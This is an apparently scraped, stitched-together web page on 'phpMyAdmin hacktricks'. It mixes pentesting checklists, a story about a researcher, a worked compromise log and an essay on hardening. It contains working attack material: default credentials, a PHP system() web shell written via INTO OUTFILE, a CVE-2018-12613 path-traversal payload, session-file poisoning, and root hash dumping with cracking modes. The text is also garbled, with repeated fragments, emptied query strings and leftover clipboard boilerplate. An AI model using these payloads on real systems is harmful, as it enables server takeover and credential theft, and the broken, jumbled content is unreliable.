Phpmyadmin Hacktricks May 2026
Extract mysql.db → find linked databases and services (wordpress, joomla, custom apps).
Stay curious, hack ethically, and always clean up after yourself.
To effectively conduct a penetration test or security audit on phpMyAdmin (PMA), it is essential to understand the transition from initial access to Remote Code Execution (RCE). phpMyAdmin is a web-based interface for managing MySQL and MariaDB, making it a high-value target. 🔍 Initial Discovery and Enumeration
Before attempting an exploit, you must identify the version and configuration. Version Detection: Check the /README or /ChangeLog files. Default Credentials: Try root:root, root:, or admin:admin.
Setup Page: Check if /setup/index.php is accessible (allows server re-configuration).
Config Files: Look for config.inc.php backups or leaked credentials in .bash_history. 🔓 Authentication Bypass & Credential Access
If you cannot log in directly, look for misconfigurations that leak access.
Empty Password: Many local environments leave the root password blank.
Config File Leakage: If the server has a Local File Inclusion (LFI), target /etc/phpmyadmin/config.inc.php.
Brute Force: Use tools like Hydra or Burp Suite against the index.php login form. 🚀 Exploitation: From Access to RCE
Once authenticated (or via specific vulnerabilities), the goal is typically to execute commands on the underlying server. 1. SQL Injection to Shell (OUTFILE)
If the MySQL user has the FILE privilege, you can write a web shell directly to the web root. Query:
SELECT "" INTO OUTFILE '/var/www/html/shell.php'; Use code with caution. Copied to clipboard
Requirement: You must know the absolute path of the web directory. 2. Local File Inclusion (LFI)
Older versions of phpMyAdmin are famous for LFI vulnerabilities.
CVE-2018-12613: Allows an authenticated user to include local files via the target parameter.
Payload: /index.php?target=db_sql.php%253f/../../../../../../etc/passwd 3. Session File Inclusion (Log Poisoning)
If LFI is possible but you cannot find a shell, poison the PHP session file. Execute a query: SELECT ""; Find your phpMyAdmin session ID (from cookies).
Include the session file: /var/lib/php/sessions/sess_[YOUR_SID]. 🛠️ Post-Exploitation & Data Exfiltration
After gaining access to the database, move toward full system compromise.
User Table Dumping: Look for wp_users (WordPress) or users tables to crack hashes.
Privilege Escalation: Check if the database user can execute sys_eval() or other UDF (User Defined Functions) to run OS commands.
Sensitive Information: Search for "password", "key", or "config" in all tables. 🛡️ Mitigation & Hardening phpmyadmin hacktricks
To secure a phpMyAdmin installation, follow these industry standards:
IP Whitelisting: Restrict access to specific IP addresses via .htaccess or Nginx config.
Two-Factor Authentication (2FA): Enable PMA's built-in 2FA support.
Disable Root Login: Force the use of non-privileged database users for daily tasks.
Update Regularly: Ensure you are on the latest stable branch to patch known LFI/CSRF flaws.
In 2025 and early 2026, security reports for phpMyAdmin have transitioned from simple misconfigurations to complex edge-case vulnerabilities, such as those involving library interactions and specific feature abuse. While classic "HackTricks" methods like SELECT ... INTO OUTFILE
remain relevant for older systems, modern research focuses on Authenticated XSS Library-Level RCE Current Critical Vulnerabilities (2025-2026)
Recent advisories highlight that even patched systems can be vulnerable due to underlying server libraries: CVE-2024-2961 (glibc/iconv RCE): A critical vulnerability in the glibc/iconv library can potentially lead to Remote Code Execution Condition: Requires the
extension to be loaded and a specific vulnerable character set used during export. Mitigation: Upgrade to phpMyAdmin 5.2.2 CVE-2025-24530 (XSS in "Check tables"): Authenticated users can trigger an XSS attack by using a specially-crafted table or database name CVE-2025-24529 (XSS in "Insert"):
An authenticated user can execute malicious scripts through the "Insert" tab functionality. CVE-2022-0813 (Information Disclosure):
Validated as a significant risk in early 2026, this flaw allows attackers to leak sensitive configuration data through malformed parameters. SentinelOne Advanced Exploitation Techniques (HackTricks Style) Penetration testers and researchers from platforms like HackTricks categorize phpMyAdmin attacks into three main tiers: Authenticated RCE via Local File Inclusion (LFI) CVE-2018-12613:
Still the most common lab example for version 4.8.0/4.8.1. Attackers use the
parameter to include session files where they have previously injected PHP code. Webshell via SQL Misconfiguration Into Outfile: If the MySQL user has
privileges and the webroot path is known, an attacker can write a shell directly to the server:
SELECT '' INTO OUTFILE '/var/www/html/shell.php' Client-Side Attacks Arbitrary File Read:
HackTricks notes that if an attacker can force a phpMyAdmin client to connect to a malicious MySQL server, they can read local files from the user's machine. CVE-2025-24530: phpMyAdmin XSS Vulnerability - SentinelOne
This is a story about , a security researcher who used the HackTricks
methodology to turn a forgotten database portal into a complete system takeover. The Discovery
During a routine authorized assessment, Alex found a web server with a standard login page at /phpmyadmin
. Many admins leave this tool exposed to the public internet , which often serves as a primary entry point for attackers Alex tried common credentials like admin:password , but the system was locked. He then checked for the config.inc.php.bak
file—a common mistake where backup files containing plain-text passwords are left in the web directory. He found nothing, but he didn't give up. The Breakthrough Alex remembered a specific trick from the HackTricks pentesting guide : checking for setup scripts default configurations He navigated to /phpmyadmin/setup/
. While modern versions block this, this older server allowed him to see the configuration. Using a known local file inclusion (LFI) vulnerability (like the famous CVE-2018-12613 Extract mysql
), Alex was able to execute a small piece of PHP code he had "poisoned" into his session data. From Database to Shell
Once he had authenticated, Alex didn't just want the data; he wanted the server. He followed these steps: Checking Privileges : He verified he had the
privilege, which is required to read or write files on the server phpMyAdmin Documentation The "Into Outfile" Trick
: He used a SQL command to write a simple "web shell" into the web root: "" "/var/www/html/shell.php" Use code with caution. Copied to clipboard Command Execution : By visiting ://example.com , he confirmed he was running commands as the The Lesson
Alex's report helped the company understand that tools like phpMyAdmin should never be exposed to the public. To prevent this, he recommended: Restricting Access or firewall rules to only allow specific IP addresses DigitalOcean Changing the URL : Moving the interface from /phpmyadmin to a random, obscure path
: Always running the latest version to patch known LFI and RCE vulnerabilities. specific SQL commands used for different types of database takeovers?
Managing databases through phpMyAdmin is standard for developers, but it remains a primary target for attackers due to its deep access to sensitive data. Following the methodology often cited in resources like HackTricks, penetration testers focus on misconfigurations, version-specific vulnerabilities, and post-authentication exploits to compromise web servers. 1. Initial Reconnaissance & Discovery
Before exploitation, attackers must locate and fingerprint the service.
Discovery: Common paths like /phpmyadmin/, /pma/, or /mysql/ are often found using directory brute-forcing tools like Gobuster or Nikto.
Information Leakage: Checking the /setup/index.php or /scripts/setup.php directories can sometimes reveal sensitive configuration data if the admin failed to restrict access.
Version Fingerprinting: Identifying the exact version (e.g., via the login page footer or /README) is critical, as many exploits are highly version-dependent. 2. Common Authentication Attacks
Default Credentials: Many installations still use root with no password or common defaults like admin/admin.
Authentication Bypass: Certain versions or plugins (like Portable phpMyAdmin version 1.3.0) have historically suffered from bypass vulnerabilities, allowing access without valid credentials.
Brute Force: If default logins fail, attackers may use automated tools to spray common database passwords. 3. Exploiting Vulnerabilities (The "HackTricks" Way)
Once access is gained—or if a pre-auth vulnerability exists—the focus shifts to gaining a shell. Local File Inclusion (LFI) to RCE
One of the most famous exploits is CVE-2018-12613, affecting versions 4.8.0 and 4.8.1.
LOAD DATA INFILE '/etc/passwd' INTO TABLE temp_table FIELDS TERMINATED BY '\n';
Create a temp table to hold file contents.
phpMyAdmin is the most popular database management tool on the planet. Written in PHP, it provides a web-based interface to manage MySQL and MariaDB servers. While it is a godsend for developers, it is a prime target for attackers. If an adversary gains access to phpMyAdmin, the game is over — they can dump credentials, escalate privileges, and even gain remote code execution (RCE) on the host server.
In the spirit of HackTricks (the legendary repository for pentesting tricks), this article compiles the most effective techniques to abuse, bypass, and exploit phpMyAdmin installations.
Disclaimer: This article is for educational purposes and authorized security testing only. Unauthorized access to databases is illegal.
From the database, attackers can:
Target: https://target.com/phpmyadmin/ (version 4.8.1)
Step 1: Found accessible via dirb.
Step 2: Weak credentials admin:admin succeed.
Step 3: Run SHOW VARIABLES LIKE 'secure_file_priv' → empty value (good).
Step 4: Write shell via INTO OUTFILE to /var/www/html/uploads/cmd.php.
Step 5: Access https://target.com/uploads/cmd.php?cmd=id → uid=33(www-data).
Step 6: Read /etc/passwd, find another DB password, pivot to production server.
Outcome: Full internal compromise. Stay curious, hack ethically, and always clean up
SELECT authentication_string FROM mysql.user WHERE user='root';
Crack with Hashcat mode 7400 (MySQL 5.6+) or 300 (pre-4.1).
In the vast ecosystem of web hosting and database management, few tools are as ubiquitous and simultaneously as scrutinized as phpMyAdmin. Designed as a free, user-friendly interface to manage MySQL and MariaDB databases, it has become a staple for developers and system administrators worldwide. However, this very accessibility and power create a high-value target for malicious actors. The term "phpMyAdmin Hacktricks" refers not to a single exploit, but to a collection of techniques, misconfigurations, and creative attack paths that adversaries use to pivot from a simple web interface to complete server compromise. Understanding these tricks is less about learning to attack and more about learning to defend; it is an exercise in proactive security, revealing how small oversights can lead to catastrophic data breaches.
The most fundamental "hacktrick" against phpMyAdmin is the brute-force attack. Since phpMyAdmin presents a login page requiring a MySQL username and password, attackers launch credential-stuffing or dictionary attacks against it. The trick here is not technical sophistication but reconnaissance. Attackers scan for common login URLs like /phpmyadmin, /pma, or /dbadmin. Once discovered, the default root account with a weak or null password is the holy grail. The takeaway for defenders is immediate: change default credentials, enforce strong password policies, and implement account lockout mechanisms or two-factor authentication (2FA) where possible. Without these, phpMyAdmin is effectively a digital vault with a sticky note containing the combination on its frame.
Beyond authentication, a more dangerous class of tricks exploits the tool’s legitimate features. If an attacker successfully logs in, they do not immediately dump tables; they think laterally. For instance, using INTO OUTFILE or INTO DUMPFILE SQL commands, an attacker can write a malicious PHP web shell directly onto the web server. The trick is to find the server’s web root directory (e.g., /var/www/html/) and execute a query like: SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php". Suddenly, the database management tool becomes a launchpad for remote code execution (RCE). Defenders can mitigate this by ensuring the MySQL user does not have FILE privilege, configuring the secure_file_priv directive to restrict file operations to a safe directory, and properly separating database and web server permissions.
Another sophisticated hacktrick involves leveraging phpMyAdmin’s own setup scripts or configuration files. Older versions contained known vulnerabilities like CVE-2016-5734 (a remote code execution in the setup script) or CVE-2018-12613 (a local file inclusion). Attackers maintain databases of these vulnerabilities and automate scanning for unpatched installations. The trick is not just to exploit the bug, but to chain it—using a file inclusion to read the system’s /etc/passwd, then escalating privileges. The defensive countermeasure is brutally simple yet frequently ignored: keep phpMyAdmin updated. Automating patch management and removing the /setup directory from production servers eliminates entire classes of these attacks.
Perhaps the most insidious trick is using phpMyAdmin as a persistence or exfiltration point. Once inside, an attacker can create new, hidden database users with granular privileges, ensuring a backdoor even if the original password is changed. They can also use stored procedures or triggers to copy sensitive data to an external server via SELECT ... INTO OUTFILE or even use MySQL’s sys_exec() function from the lib_mysqludf_sys library to execute system commands. The defensive trick here is principle of least privilege—the MySQL user used by phpMyAdmin should not be the global root user. Instead, create a specific user with only the necessary CRUD (Create, Read, Update, Delete) permissions on required databases, and disable dangerous functions.
From a blue-team perspective, the ultimate hacktrick is not any single exploit but the assumption that "it won't happen to me." Many defenders focus on firewalls and intrusion detection while neglecting application-layer hygiene. To truly secure phpMyAdmin, one must adopt a multi-layered strategy: move the login page to a non-standard URL (security through obscurity as a first, not only, layer), enforce HTTPS to prevent credential sniffing, bind phpMyAdmin to a localhost interface or a VPN-protected subnet, use a Web Application Firewall (WAF) to block suspicious SQL keywords, and regularly audit database logs for anomalies like INTO OUTFILE queries or repeated failed logins.
In conclusion, the world of "phpMyAdmin hacktricks" is a mirror reflecting both the ingenuity of attackers and the common failings of defenders. Each trick—be it brute force, file write abuse, legacy vulnerability exploitation, or persistence setup—originates from a mismatch between expected and actual security posture. For an ethical hacker or system administrator, studying these tricks is not about glorifying the attack but about internalizing the defense. By thinking like an adversary who sees phpMyAdmin as a treasure map, one can transform this powerful tool from a vulnerability magnet into a securely managed utility. The final hacktrick, then, belongs to the defender: the trick of staying one step ahead through vigilance, updates, and the relentless application of the principle of least privilege.
For those looking to assess the security of phpMyAdmin installations, HackTricks
provides a comprehensive guide focused on reconnaissance and exploitation techniques. The methodology generally follows a path from basic identification to gaining Remote Code Execution (RCE). 1. Initial Reconnaissance & Login
Version Identification: Locate the version by checking the /README or /ChangeLog files, or look for the PMA_VERSION string in the page source.
Default Credentials: Always test common defaults like root:root, root:admin, or root with no password. Some systems may also have anonymous login enabled.
Weak Credentials: If defaults fail, attempt a dictionary attack. Note that many environments may lack rate limiting, though some may require a rate-limit bypass using headers like X-Forwarded-For. 2. Post-Authentication Exploitation
Once logged in, the primary goal is often to pivot from database access to server-level access. Writing a Web Shell (SELECT ... INTO OUTFILE):
If the database user has FILE privileges and you know the absolute web path (e.g., /var/www/html), you can write a PHP shell directly to the disk.
Prerequisite check: Run SHOW VARIABLES LIKE '%secure_file_priv%'; to see if file exports are restricted. Local File Inclusion (LFI) to RCE:
Vulnerability Example: Specific versions like 4.8.0 and 4.8.1 are vulnerable to a path traversal flaw (CVE-2018-12613).
Technique: Execute a SQL query containing PHP code (e.g., SELECT '';). Then, include the session file (located at /var/lib/php/sessions/sess_[YOUR_SESSION_ID]) via the vulnerable target parameter to trigger the code. 3. Advanced Persistence and Attacks
Configuration Files: Check for config.inc.php which may contain hardcoded credentials for other services or the root database user.
PHP Wrappers: Use PHP wrappers (like php://filter) in conjunction with file inclusion vulnerabilities to read the source code of sensitive configuration files. Summary of Common Vulnerabilities Vulnerability Type Description Default Creds Using common login pairs like root:root. CVE-2018-12613 LFI vulnerability in versions 4.8.0-4.8.1 used for RCE. INTO OUTFILE
Writing malicious scripts to the web root if permissions allow. Setup Scripts
Older versions may have a /setup directory left accessible which can be used to reconfigure the server.